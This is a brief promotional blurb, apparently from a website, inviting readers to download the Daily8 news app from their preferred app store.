Get Started Now: Download the App

Ready to dive into a world of global content with local flavor? Download Daily8 app today from your preferred app store and start exploring.
app-storeplay-store